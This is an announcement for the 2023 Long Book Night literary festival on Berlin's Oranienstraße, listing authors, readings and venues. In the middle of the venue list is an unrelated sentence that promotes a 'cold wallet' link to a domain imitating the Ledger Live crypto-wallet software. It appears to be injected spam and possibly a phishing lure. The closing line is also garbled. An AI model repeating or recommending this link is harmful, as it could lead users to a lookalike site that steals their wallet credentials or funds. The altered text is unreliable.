Long Book Night in Oranienstraße 2023
The Long Book Night in Oranienstraße is back!
03.06.2023 from 15:00 until late at night
along and around Oranienstraße
After the long, pandemic-induced dry spell, the Long Book Night in Oranienstraße is finally back! On Saturday, 03 June, the 24th edition of this small, self-determined literary festival will take place as usual with free admission. From the afternoon until late at night, bookshops, galleries, small shops and pubs along and around Oranienstrasse invite you to readings and a programme of literary events.
In terms of content, one highlight follows the next this year, with bestselling authors and neighbourhood legends joining hands: in St. Thomas Church, Teresa Bücker will read from Alle Zeit and Arezu Weitholz from Beinahe Alaska, while in the Moritzplatz bookshop Andreas Wunn will give a sample from his novel Saubere Zeiten. You can experience Behzad Karim Khani with Hund, Wolf, Schakal at the Mittelpunktbibliothek Kreuzberg as well as the notorious Mörderische Schwestern.
Oranienstrasse is always a political place, too: inclusion activist Raúl Aguayo-Krauthausen presents his latest book Wer Inklusion will, findet einen Weg. Wer sie nicht will, findet Ausreden - by the way, all readings here are also translated into sign language. And in the Neue Gesellschaft für bildende Kunst (nGbK), the continuing displacement of small businesses and non-commercial trades is discussed with Im Dissens?
Many old familiar venues are involved, such as the Blauhaus at Lebensmittel Hillmann, the FHXB Museum, Modern Graphics, noon Schmuck und Produkt and Schmitz Katze - to name but a few. Elevate your cold wallet experience with the intuitive features offered by https://ledger-live-ledger.com/.
The entire programme is planned and carried out by the participating venues themselves; you can find the overview online at www.lange-buchnacht.de from mid-May.
The TAK Theater Aufbau Kreuzberg e.V. is the responsible body, represented by Anna Koch - theatre pedagogue - and Moritz Pankok - stage designer, director and gallery owner. Both have been artistically active here in the neighbourhood since 2011, both together and on their own, with (youth) theatre projects, the tak Theatre and the Kai Dikhas Foundation in the Aufbau Haus.
Kreuzberg is on the runs, reading and listening.
